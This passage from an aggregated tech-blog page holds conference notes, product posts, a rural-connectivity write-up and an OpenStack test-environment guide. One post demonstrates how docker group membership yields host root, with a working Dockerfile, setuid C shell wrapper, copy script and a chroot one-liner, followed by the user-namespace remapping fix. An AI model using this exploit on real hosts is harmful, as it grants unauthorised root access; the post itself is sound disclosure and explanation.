      • Devs are paid to code, not to maintain deployment and config scripts
      • Ops must provide env that requires devs to do zero setup scripts
    • Test Service and Environment Virtualisation
      • If you are doing 2-week sprints, but it takes 3 weeks to get a test server, how long are your sprints really?
    • Release Management
      • No good if 99% of software works but last 1% is vital for the business function
    • Operational Readiness for SRE
      • Shift between MTBF to MTTR
      • MTTR  = Mean time to detect + Mean time to Triage + Mean time to restore
      • + Mean time to pass blame
    • Antifragile Systems
      • Things that neither are fragile or robust, but rather thrive on chaos
      • Cattle not pets
      • Servers may go red, but services are always green
    • DevOps: “Everybody is responsible for delivery to production”
    • SRE: “(Everybody) is responsible for delivering Continuous Business Value”


by simon at October 04, 2017 03:04 AM

October 03, 2017

Simon Lyall

DevOps Days Auckland 2017 – Wednesday Session 2

Marcus Bristol (Pushpay) – Moving fast without crashing

  • Low tolerance for errors in production due to being in finance
  • Deploy twice per day
  • Just Culture – Balance safety and accountability
    • What rule?
    • Who did it?
    • How bad was the breach?
    • Who gets to decide?
  • Example of Retributive Culture
    • KPIs reflect incidents.
    • If more than 10% of deploys are bad, it affects bonus
    • Reduced number of deploys
  • Restorative Culture
  • Blameless post-mortem
    • Can give detailed account of what happened without fear or retribution
    • Happens after every incident or near-incident
    • Written Down in Wiki Page
    • So everybody has the chance to have a say
    • Summary, Timeline, impact assessment, discussion, Mitigations
    • Mitigations become highest-priority work items
  • Our Process
    • Feature Flags
    • Science
    • Lots of small PRs
    • Code Review
    • Testers paired to devs so bugs can be fixed as soon as found
    • Automated testing
    • Pollination (reviews of code between teams)
    • Bots
      • Posts to Slack when feature flag has been changed
      • Nags about feature flags that seems to be hanging around in QA
      • Nags about Flags that have been good in prod for 30+ days
      • Every merge
      • PRs awaiting reviews for long time (days)
      • Missing postmortem mitigations
      • Status of builds in build farm
      • When deploy has been made
      • Health of API
      • Answer queries on team member list
      • Create ship train of PRs into a build and user can tell bot to deploy to each environment


by simon at October 03, 2017 10:39 PM

DevOps Days Auckland 2017 – Wednesday Session 1

Michael Coté – Not actually a DevOps Talk

Digital Transformation

  • Goal: deliver value weekly, reliably, with small patches
  • Management must be the first to fail and transform
  • Standardize on a platform: special snowflakes are slow, expensive and error prone (see his slide, good list of stuff that should be standardized)
  • Ramping up: “Pilot low-risk apps, and ramp-up”
  • Pair programming/working
    • Half the advantage is people spend less time on reddit “research”
  • Don’t go to meetings
  • Automate compliance: have what you do automatically get logged and create compliance docs, rather than building them manually.
  • Crafting Your Cloud-Native Strategy

Sajeewa Dayaratne – DevOps in an Embedded World

  • Challenges on Embedded
    • Hardware – resource constrained
    • Debugging – OS bugs, Hardware Bugs, UFO Bugs – Oscilloscopes and JTAG connectors are your friend.
    • Environment – Thermal, Moisture, Power consumption
    • Deploy to product – Multi-month cycle, hard or impossible to send updates to ships at sea.
  • Principles of Devops , equally apply to embedded
    • High Frequency
    • Reduce overheads
    • Improve defect resolution
    • Automate
    • Reduce response times
  • Navico
    • Small Sonar, Navigation for medium boats, Displays for sailing (e.g. America's Cup), Navigation displays for large ships
    • Dev around world, factory in Mexico
  • Codebase
    • 5 million lines of code
    • 61 Hardware Products supported – Increasing steadily, very long lifetimes for hardware
    • Complex network of products – lots of products on boat all connected, different versions of software and hardware on the same boat
  • Architecture
    • Old codebase
    • Backward compatible with old hardware
    • Needs to support new hardware
    • Desire new features on all products
  • What does this mean
    • Defects were found too late
    • Very high cost of bugs found late
    • Software stabilization taking longer
    • Manual test couldn’t keep up
    • Cost increasing , including opportunity cost
  • Does CI/CD provide answer?
    • But will it work here?
    • Case Study from HP. Large-Scale Agile Development by Gary Gruver
  • Our Plan
    • Improve tools and architecture
    • Build Speeds
    • Automated testing
    • Code quality control
  • Previous VCS
    • Proprietary tool with limit support and upgrades
    • Limited integration
    • Lack of CI support
    • No code review capacity
  • Move to git
    • Code reviews
    • Integrated CI
    • Supported by tools
  • Architecture
    • Had a configurable codebase already
    • Fairly common hardware platform (only 9 variations)
    • Had runtime feature flags
    • But
      • Cyclic dependencies – 1.5 years to clean these up
      • Singletons – cut down
      • Promote unit testability – worked on
      • Many branches – long lived – mega merges
  • Went to a single Branch model, feature flags, smaller batch sizes, testing focused on single branch
  • Improve build speed
    • Start: 8 hours to build Linux platform, 2 hours for each app, 14+ hours to build and package a release
    • Options
      • Increase speed
      • Parallel Builds
    • What did
      • ccache, clcache
      • IncrediBuild
      • distcc
    • 4-5 hrs down to 1 hr
  • Test automation
    • Existing tests were mock-ups of the hardware, so not typical
    • Started with micro-test
      • Unit testing (simulator)
      • Unit testing (real hardware)
    • Build Tools
      • Software tools (n2k simulator, remote control)
      • Hardware tools (mimic real-world data, repurpose existing stuff)
    • UI Test Automation
      • Build or Buy
      • Functional testing vs API testing
      • HW Test tools
      • Took 6 hours to do full test on hardware.
  • PipeLine
    • Commit -> pull request
    • Automated Build / Unit Tests
    • Daily QA Build
  • Next?
    • Configuration as code
    • Code Quality tools
    • Simulate more hardware
    • Increase analytics and reporting
    • Fully simulated test env for dev (so the devs don’t need the hardware)
    • Scale – From internal infrastructure to the cloud
    • Grow the team
  • Lessons Learnt
    • Culture!
    • Collect Data
    • Get Executive Buy in
    • Change your tools and processes if needed
    • Test automation is the key
      • Invest in HW
      • Simulate
      • Virtualise
    • Focus on good software design for Everything


by simon at October 03, 2017 09:29 PM

Sean's IT Blog

Coming Soon – The Virtual Horizon Podcast #blogtober

I’ve been blogging now for about seven or so years, and The Virtual Horizon has existed in its current form for about two or three years.

So what’s next?  Besides for more blogging, that is…

It’s time to go multimedia.  In the next few weeks, I will be launching The Virtual Horizon Podcast.  The podcast will only partially focus on the latest in end-user computing, and I hope to cover other topics such as career development, community involvement, and even other technologies that exist outside of the EUC space.

I’m still working out some of the logistics and workflow, but the first episode has already been recorded.  It should post in the next couple of weeks.

So keep an eye out here.  I’ll be adding a new section to the page once we’re a bit closer to go-live.


by seanpmassey at October 03, 2017 05:37 PM

Sarah Allen

ultimate serverless combo: Firestore + Functions

Serverless development just got easier — today’s release of Cloud Firestore with event triggers for Cloud Functions combine to offer significant developer velocity from idea to production to scale.

I’ve worked on dozens of mobile and web apps and have always been dismayed by the amount of boilerplate code needed to shuffle data between client and server and implement small amounts of logic on the server-side. Serverless APIs + serverless compute reduce the amount of code needed to write an app, increasing velocity throughout the development cycle. Less code means fewer bugs.

Cloud Firestore + Cloud Functions with direct-from-mobile access enabled by Firebase Auth and Firebase Rules combine to deliver something very new in this space. Unhosted Web apps are also enabled by Web SDKs.

It is not a coincidence that I’ve worked on all of these technologies since joining Google last year. My first coding project at Google was developing the initial version of the Firestore UI in the Firebase Console. I then stepped into an engineering management role, leading the engineering teams that work on server-side code where Firebase enables access to Google Cloud.

Cloud Firestore

  • Realtime sync across Web and mobile clients: This is not just about realtime apps. Building user interfaces is substantially easier: using reactive patterns and progressively filling in details allows apps to be ready for user interaction faster.
  • Scales with the size of the result set: Simple apps are simple. For complex apps, you still need to be thoughtful about modeling your data, and the reward is that anything that works for you and your co-workers will scale to everyone on the planet using your app. From my perspective, this is the most significant and exciting property of the Cloud Firestore.
  • iOS, Android and Web SDKs

Cloud Functions

  • Events for create, write, update, and delete (learn how)
  • Write and deploy JavaScript functions that do exactly and only what you need
  • You can also use TypeScript (JS SDKs include typings)

All the Firebase things

  • Free tier and when you exceed that, you only pay for what you use.
  • Zero to planet scale: no sharding your database, no calculating how many servers you need, focus on how your app works.
  • Secure data access with Firebase Rules: simple, yet powerful declarative syntax to specify what data can be accessed by client code. For example, some data may be read-only access for social sharing or public parts of an app, user data might be only written by that user, and some other data may be only written by server-code.
  • Firebase Auth: all the social logins, email/password, phone or you can write code for custom auth
  • Lots more Firebase things

All this combines to allow developers to focus on building an app, writing new code that offers unique value. It’s been a while since I’ve been actually excited about new technology that has immediate and practical use cases. I’m so excited to be able to use this tech in the open for my side projects, and can’t wait to see the serious new apps…..

by sarah at October 03, 2017 05:07 PM

October 02, 2017

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – September 2017

Here is my next monthly "Security Warrior" blog round-up of the top 5 popular posts/topics this month:
  1. “Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge. Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” …
  2. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our 2016 research on developing security monitoring use cases here.
  3. “Simple Log Review Checklist Released!” is often at the top of this list – this aging checklist is still a very useful tool for many people. “On Free Log Management Tools” (also aged a bit by now) is a companion to the checklist (updated version)
  4. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (now in its 4th edition!) – note that this series is mentioned in some PCI Council materials. 
  5. “SIEM Bloggables”  is a very old post , more like a mini-paper on  some key aspects of SIEM, use cases, scenarios, etc as well as 2 types of SIEM users.
In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 5X of the traffic of this blog]: 

Current research on SIEM:
Planned research on SOAR (security orchestration,  automation and response):
Planned research on MSSP:

Miscellaneous fun posts:

(see all my published Gartner research here)
Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016.

Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

Previous post in this endless series:

by Anton Chuvakin (anton@chuvakin.org) at October 02, 2017 03:13 PM

Everything Sysadmin

Final reminder: "DNS as Code" talk at NYCDevOps tonight!

  • Topic: DNSControl: "DNS as Code" from StackOverflow.com
  • Speaker: Thomas A. Limoncelli, SRE Manager @ Stack Overflow
  • Date: Monday, October 2, 2017
  • Time: 6:30-9:30 PM (SPECIAL TIME AND LOCATION)
  • Location: Madison Suite, Hilton Midtown, 1335 6th Ave, New York, NY 10019
  • https://www.meetup.com/nycdevops/events/243369226/

VelocityNYC is in town this week. They've graciously provided space for us to host an additional meeting. Space is limited! RSVP soon! Full details and RSVP.

We will be going out for drinks after the talk.

by Tom Limoncelli at October 02, 2017 03:00 PM

Errata Security

Microcell through a mobile hotspot

I accidentally acquired a tree farm 20 minutes outside of town. For utilities, it gets electricity and basic phone. It doesn't get water, sewer, cable, or DSL (i.e. no Internet). Also, it doesn't really get cell phone service. While you can get SMS messages up there, you usually can't get a call connected, or hold a conversation if it does.

We have found a solution -- an evil solution. We connect an AT&T "Microcell", which provides home cell phone service through your Internet connection, to an AT&T Mobile Hotspot, which provides an Internet connection through your cell phone service.


Now, you may be laughing at this, because it's a circular connection. It's like trying to make a sailboat go by blowing on the sails, or lifting up a barrel to lighten the load in the boat.

But it actually works.

Since we get some, but not enough, cellular signal, we set up a mast 20 feet high with a directional antenna pointed at the cell tower 7.5 miles to the southwest, connected to a signal amplifier. It's still an imperfect solution, as we still get terrain distortions in the signal, but it provides a good enough signal-to-noise ratio to get a solid connection.

We then connect that directional antenna directly to a high-end Mobile Hotspot. This gives us a solid 2 Mbps connection with latency under 30 milliseconds. That's far below the 50 Mbps you can get right next to a 4G/LTE tower, but it's still pretty good for our purposes.

We then connect the AT&T Microcell to the Mobile Hotspot, via WiFi.

To avoid the circular connection, we lock the Mobile Hotspot to 4G/LTE frequencies and the Microcell to 3G. This prevents the Mobile Hotspot from locking onto the strong 3G signal from the Microcell, and it keeps the two from interfering with each other.

This works really great. We now get a strong cell signal on our phones even 400 feet from the house through some trees. We can be all over the property, out in the lake, down by the garden, and so on, and have our phones work as normal. It's only AT&T, but that's what the whole family uses.

You might be asking why we didn't just use a normal signal amplifier, like those used on corporate campuses. Such an amplifier boosts all the analog frequencies, making any cell phone service work.

We've tried this, and it works a bit, allowing cell phones to work inside the house pretty well. But they don't work outside the house, which is where we spend a lot of time. In addition, while our newer phones work, my sister's iPhone 5 doesn't. We have no idea what's going on. Presumably, we could hire professional installers and stuff to get everything working, but nobody would quote us a price lower than $25,000 to even come look at the property.

Another possible solution is satellite Internet. There are two satellites in orbit that cover the United States with small "spot beams" delivering high-speed service (25 Mbps downloads). However, the latency is 500 milliseconds, which makes it impractical for low-latency applications like phone calls.

While I know a lot about the technology in theory, I find myself hopelessly clueless in practice. I've been playing with SDR ("software defined radio") to try to figure out exactly where to locate and point the directional antenna, but I'm not sure I've come up with anything useful. In casual tests, it seems rotating the antenna from vertical to horizontal increases the signal-to-noise ratio a bit, which seems counterintuitive and should not happen. So I'm completely lost.

Anyway, I thought I'd write this up as a blogpost, in case anybody has better suggestions -- either about signals, or about getting wired connectivity instead. Properties a half mile away get DSL; I wish I knew who to talk to at the local phone company about paying them to extend Internet to our property.

Phone works in all this area now

by Robert Graham (noreply@blogger.com) at October 02, 2017 01:13 AM

September 30, 2017

Electricmonk.nl

Root your Docker host in 10 seconds for fun and profit

Disclaimer: There is no actual profit. That was just one of those clickbaity things everybody seems to like so much these days. Also, it's not really fun. Alright, on with the show!

A common practice is to add users that need to run Docker containers on your host to the docker group. For example, an automated build process may need a user on the target system to stop and recreate containers for testing or deployments. What is not obvious right away is that this is basically the same as giving those users root access. You see, the Docker daemon runs as root, and when you add users to the docker group, they get full control over the Docker daemon.

So how hard is it to exploit this and become root on the host if you are a member of the docker group? Not very hard at all…

$ id
uid=1000(fboender) gid=1000(fboender) groups=1000(fboender), 999(docker)
$ cd docker2root
$ docker build --rm -t docker2root .
$ docker run -v /tmp/persist:/persist docker2root:latest /bin/sh root.sh
$ /tmp/persist/rootshell
# id
uid=0(root) gid=1000(fboender) groups=1000(fboender),999(docker)
# ls -la /root
total 64
drwx------ 10 root root 4096 aug  1 10:32 .
drwxr-xr-x 25 root root 4096 sep 19 05:51 ..
-rw-------  1 root root  366 aug  3 09:26 .bash_history

So yeah, that took all of 3 seconds. I know I said 10 in the title, but the number 10 has special SEO properties. Remember, this is on the Docker host, not in a container or anything!

How does it work?

When you mount a volume into a container, that volume is mounted as root. By default, processes in a container also run as root. So all you have to do is write a setuid root owned binary to the volume, which will then appear as a setuid root binary on the host in that volume too.

Here's what the Dockerfile looks like:

FROM alpine:3.5
COPY root.sh root.sh
COPY rootshell rootshell

The rootshell file is a binary compiled from the following source code (rootshell.c):

#include <unistd.h>
#include <stdlib.h>

int main()
{
   setuid( 0 );
   system( "/bin/sh" );
   return 0;
}

The wrapper isn't strictly needed, but most shells and many other programs refuse to keep elevated privileges when run as a setuid binary; the setuid(0) call makes the real UID root before spawning the shell, so the shell doesn't drop them.

The root.sh file simply copies the rootshell binary to the volume and sets the setuid bit on it:

#!/bin/sh

cp rootshell /persist/rootshell
chmod 4777 /persist/rootshell

That's it.
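As an aside (not part of the original demo), the same result needs no image build at all: anyone in the docker group can bind-mount the host's root filesystem into a stock image and chroot into it. A minimal sketch:

```shell
# Bind-mount the host's / into a throwaway Alpine container and chroot into it.
# Any member of the docker group gets a root shell on the host this way.
docker run --rm -it -v /:/host alpine chroot /host /bin/sh
```

This variant also sidesteps the persistent volume entirely; it leaves no setuid binary behind.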

Why I don't need to report this

I don't need to report this, because it is a well-known vulnerability. In fact, it's one of the less worrisome ones; there are plenty more, including all kinds of privilege escalation vulnerabilities from inside containers. As far as I know, it hasn't been fixed in the latest Docker, nor will it be fixed in future versions. This is in line with the modern stance on security in the tech world: "security? What's that?" Docker goes so far as to call them "non-events". Newspeak if I ever heard it.

Some choice bullshit quotes from the Docker frontpage and documentation:

Secure by default: Easily build safer apps, ensure tamper-proof transit of all app components and run apps securely on the industry’s most secure container platform.

LOL, sure.

We want to ensure that Docker Enterprise Edition can be used in a manner that meets the requirements of various security and compliance standards.

Either that same courtesy does not extend to the community edition, security by default is no longer a requirement, or it's a completely false claim.

They do make some casual remarks about not giving access to the docker daemon to untrusted users in the Security section of the documentation:

only trusted users should be allowed to control your Docker daemon

However, they fail to mention that giving a user control of your Docker daemon is basically the same as giving them root access. Given that many companies are doing auto-deployments and have probably given docker daemon access to a deployment user, your build server is now effectively also root on all your build slaves, dev, uat, and perhaps even production systems.

Luckily, since Docker’s approach to secure by default through apparmor, seccomp, and dropping capabilities

3 seconds to get root on my host with a default Docker install doesn't look like "secure by default" to me. None of these options were enabled by default when I CURL-installed (!!&(@#!) Docker on my system, nor was I warned that I'd need to secure things manually.

How to fix this

There's a workaround available. It's hidden deep in the documentation and took me a while to find. Eventually some StackExchange discussion pointed me to a concept known as UID remapping (subuids). This uses the Linux namespaces capabilities to map the user IDs of users in a container to a different range on the host. For example, if you remap the container's UIDs to start at 20000, then the root user (uid 0) in the container becomes uid 20000 on the host, uid 1 becomes uid 20001, etc.

You can read about how to manually (because docker is secure by default, remember) configure that on the Isolate containers with a user namespace documentation page. 
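Concretely, the remapping is a daemon-level setting. A minimal sketch based on the documented userns-remap option (the "default" value makes Docker create a dockremap user with subordinate uid/gid ranges):

```shell
# /etc/docker/daemon.json -- enable user namespace remapping.
cat > /etc/docker/daemon.json <<'EOF'
{
  "userns-remap": "default"
}
EOF
systemctl restart docker
# Root (uid 0) inside containers now maps to an unprivileged host uid,
# so a setuid binary written to a volume is owned by that uid, not host root.
```

Note that this changes the apparent ownership of bind-mounted files inside containers, which is exactly why it defuses the exploit above.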

by admin at September 30, 2017 12:39 PM

Joe Topjian

Building OpenStack Environments

Introduction

I work on a number of OpenStack-based projects. In order to make sure they work correctly, I need to test them against an OpenStack environment. It's usually not a good idea to test on a production environment, since mistakes and bugs can cause damage to production.

So the next best option is to create an OpenStack environment strictly for testing purposes. This blog post will describe how to create such an environment.

Where to Run OpenStack

The first topic of consideration is where to run OpenStack.

VirtualBox

At a minimum, you can install VirtualBox on your workstation and create a virtual machine. This is quick, easy, and free. However, you're limited to the resources of your workstation. For example, if your laptop only has 4GB of memory and two cores, OpenStack is going to run slow.

AWS

Another option is to use AWS. While AWS offers a free tier, it's restricted (I think) to the t2.micro flavor. This flavor only supports 1 vCPU, which is usually worse than your laptop. Larger instances will cost anywhere from $0.25 to $5.00 (and up!) per hour to run. It can get expensive.

However, AWS offers "spot-instances". These are virtual machines that cost a fraction of normal virtual machines. This is possible because spot instances run on spare, unused capacity in Amazon's cloud. The catch is that your virtual machine could be deleted when a higher paying customer wants to use the space. You certainly don't want to do this for production (well, you can, and that's a fun exercise on its own), but for testing, it's perfect.

With Spot Instances, you can run an m3.xlarge flavor, which consists of 4 vCPUs and 16GB of memory, for $0.05 per hour. An afternoon of work will cost you $0.20. Well worth the cost of 4 vCPUs and 16GB of memory, in my opinion.

Spot Pricing is constantly changing. Make sure you check the current price before you begin working. And make sure you do not leave your virtual machine running indefinitely!

Other Spot Pricing Clouds

Both Google and Azure offer spot instances, however, I have not had time to try them, so I can't comment.

Your Own Cloud

The best resource is your own cloud. Maybe you already have a home lab set up or your place of $work has a cloud you can use. This way, you can have a large amount of resources available to use for free.

Provisioning a Virtual Machine

Once you have your location sorted out, you need to decide how to interact with the cloud to provision a virtual machine.

At a minimum, you can use the standard GUI or console that the cloud provides. This works, but it's a hassle to have to manually go through all settings each time you want to launch a new virtual machine. It's always best to test with a clean environment, so you will be creating and destroying virtual machines a lot. Manually setting up virtual machines will get tedious and is prone to human error. Therefore, it's better to use a tool to automate the process.

Terraform

Terraform is a tool that enables you to declaratively create infrastructure. Think of it like Puppet or Chef, but for virtual machines and virtual networks instead of files and packages.

I highly recommend Terraform for this, though I admit I am biased because I spend a lot of time contributing to the Terraform project.

Deploying to AWS

As a reference example, I'll show how to use Terraform to deploy to AWS. Before you begin, make sure you have a valid AWS account and you have gone through the Terraform intro.

There's some irony about using AWS to deploy OpenStack. However, some readers might not have access to an OpenStack cloud to deploy to. Please don't turn this into a political discussion.

On your workstation, open a terminal and make a directory:

$ pwd
/home/jtopjian
$ mkdir terraform-openstack-test
$ cd terraform-openstack-test

Next, generate an SSH key pair:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir key
$ cd key
$ ssh-keygen -t rsa -N '' -f id_rsa
$ cd ..

Next, create a main.tf file which will house our configuration:

$ pwd
/home/jtopjian/terraform-openstack-test
$ vi main.tf

Start by creating a key pair:

provider "aws" {
  region = "us-west-2"
}

resource "aws_key_pair" "openstack" {
  key_name   = "openstack-key"
  public_key = "${file("key/id_rsa.pub")}"
}

With that in place, run:

$ terraform init
$ terraform apply

Next, create a Security Group. This will allow traffic in and out of the virtual machine. Add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

+ resource "aws_security_group" "openstack" {
+   name        = "openstack"
+   description = "Allow all inbound/outbound traffic"
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "tcp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "udp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "icmp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+ }

Note: Don't include the +. It's used to highlight what has been added to the configuration.

With that in place, run:

$ terraform plan
$ terraform apply

If you log in to your AWS console through a browser, you can see that the key pair and security group have been added to your account.

You can easily destroy and recreate these resources at-will:

$ terraform plan
$ terraform destroy
$ terraform plan
$ terraform apply
$ terraform show

Finally, create a virtual machine. Add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

  resource "aws_security_group" "openstack" {
    name        = "openstack"
    description = "Allow all inbound/outbound traffic"

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "tcp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "udp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "icmp"
      cidr_blocks = ["0.0.0.0/0"]
    }

  }

+ resource "aws_spot_instance_request" "openstack" {
+   ami = "ami-0c2aba6c"
+   spot_price = "0.0440"
+   instance_type = "m3.xlarge"
+   wait_for_fulfillment = true
+   spot_type = "one-time"
+   key_name = "${aws_key_pair.openstack.key_name}"
+
+   security_groups = ["default", "${aws_security_group.openstack.name}"]
+
+   root_block_device {
+     volume_size = 40
+     delete_on_termination = true
+   }
+
+   tags {
+     Name = "OpenStack Test Infra"
+   }
+ }
+
+ output "ip" {
+   value = "${aws_spot_instance_request.openstack.public_ip}"
+ }

Above, an aws_spot_instance_request resource was added. This will launch a Spot Instance using the parameters we specified.

It's important to note that the aws_spot_instance_request resource also takes the same parameters as the aws_instance resource.

The ami being used is the latest CentOS 7 AMI published in the us-west-2 region. You can see the list of AMIs here. Make sure you use the correct AMI for the region you're deploying to.

Notice how this resource is referencing the other resources you created (the key pair, and the security group). Additionally, notice how you're specifying a spot_price. This is helpful to limit the amount of money that will be spent on this instance. You can get an accurate price by going to the Spot Request page and clicking on "Pricing History". Again, make sure you are looking at the correct region.

An output was also added to the main.tf file. This will print out the public IP address of the AWS instance when Terraform completes.

Amazon limits the amount of spot instances you can launch at any given time. You might find that if you create, delete, and recreate a spot instance too quickly, Terraform will give you an error. This is Amazon telling you to wait. You can open a support ticket with Amazon/AWS and ask for a larger spot quota to be placed on your account. I asked for the ability to launch 5 spot instances at any given time in the us-west-1 and us-west-2 region. This took around two business days to complete.

With all of this in place, run Terraform:

$ terraform apply

When it has completed, you should see output similar to the following:

Outputs:

ip = 54.71.64.171

You should now be able to SSH to the instance:

$ ssh -i key/id_rsa centos@54.71.64.171

And there you have it! You now have access to a CentOS virtual machine to continue testing OpenStack with.

Installing OpenStack

There are numerous ways to install OpenStack. Given that the purpose of this setup is to create an easy-to-deploy OpenStack environment for testing, let's narrow our choices down to methods that can provide a simple all-in-one setup.

DevStack

DevStack provides an easy way of creating an all-in-one environment for testing. It's mainly used to test the latest OpenStack source code. Because of that, it can be buggy. I've found that even when using DevStack to deploy a stable version of OpenStack, there were times when DevStack failed to complete. Given that it takes approximately two hours for DevStack to install, a failed installation has just wasted two hours of time.

Additionally, DevStack isn't suitable to run on a virtual machine which might reboot. When testing an application that uses OpenStack, it's possible that the application causes the virtual machine to be overloaded and lock up.

So for these reasons, I won't use DevStack here. That's not to say that DevStack isn't a suitable tool – after all, it's used as the core of all OpenStack testing.

PackStack

PackStack is also able to easily install an all-in-one OpenStack environment. Rather than building OpenStack from source, it leverages RDO packages and Puppet.

PackStack is also beneficial because it will install the latest stable release of OpenStack. If you are developing an application that end-users will use, these users will most likely be using an OpenStack cloud based on a stable release.

Installing OpenStack with PackStack

The PackStack home page has all necessary instructions to get a simple environment up and running. Here are all of the steps compressed into a shell script:

#!/bin/bash

systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network

yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
yum install -y centos-release-openstack-ocata
yum-config-manager --enable openstack-ocata
yum update -y
yum install -y openstack-packstack
packstack --allinone

OpenStack Pike is available at the time of this writing, however, I have not had a chance to test and verify the instructions work. Therefore, I'll be using Ocata.

Save the file as something like deploy.sh and then run it in your virtual machine:

$ sudo bash deploy.sh

Consider using a tool like tmux or screen after logging into your remote virtual machine. This will ensure the deploy.sh script continues to run, even if your connection to the virtual machine was terminated.
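A minimal tmux workflow for this (the session name is arbitrary):

```shell
tmux new -s packstack     # start a named session on the VM
sudo bash deploy.sh       # run the install inside the session
# Detach with Ctrl-b d; if the SSH connection drops, reattach later with:
tmux attach -t packstack
```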

The process will take approximately 30 minutes to complete.

When it's finished, you'll now have a usable all-in-one environment:

$ sudo su
$ cd /root
$ source keystonerc_demo
$ openstack network list
$ openstack image list
$ openstack server create --flavor 1 --image cirros test

Testing with OpenStack

Now that OpenStack is up and running, you can begin testing with it.

Let's say you want to add a new feature to Gophercloud. First, you need to install Go:

$ yum install -y wget
$ wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
$ chmod +x /usr/local/bin/gimme
$ eval "$(/usr/local/bin/gimme 1.8)"
$ export GOPATH=$HOME/go
$ export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

To make those commands permanent, add the following to your .bashrc file:

if [[ -f /usr/local/bin/gimme ]]; then
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
fi

Next, install Gophercloud:

$ go get github.com/gophercloud/gophercloud
$ cd ~/go/src/github.com/gophercloud/gophercloud
$ go get -u ./...

In order to run Gophercloud acceptance tests, you need to have several environment variables set. These are described here.

It would be tedious to set each variable for each test or each time you log in to the virtual machine. Therefore, embed the variables into the /root/keystonerc_demo and /root/keystonerc_admin files:

source /root/keystonerc_admin
nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
_NETWORK_ID=$(openstack network show private -c id -f value)
_SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
_EXTGW_ID=$(openstack network show public -c id -f value)
_IMAGE_ID=$(openstack image show cirros -c id -f value)

echo "" >> /root/keystonerc_admin
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

echo "" >> /root/keystonerc_demo
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

Now try to run a test:

$ source ~/keystonerc_demo
$ cd ~/go/src/github.com/gophercloud/gophercloud
$ go test -v -tags "fixtures acceptance" -run "TestServersCreateDestroy" \
  github.com/gophercloud/gophercloud/acceptance/openstack/compute/v2

That go command is long and tedious. A shortcut would be more helpful. Add the following to ~/.bashrc:

gophercloudtest() {
  if [[ -n $1 ]] && [[ -n $2 ]]; then
    pushd  ~/go/src/github.com/gophercloud/gophercloud
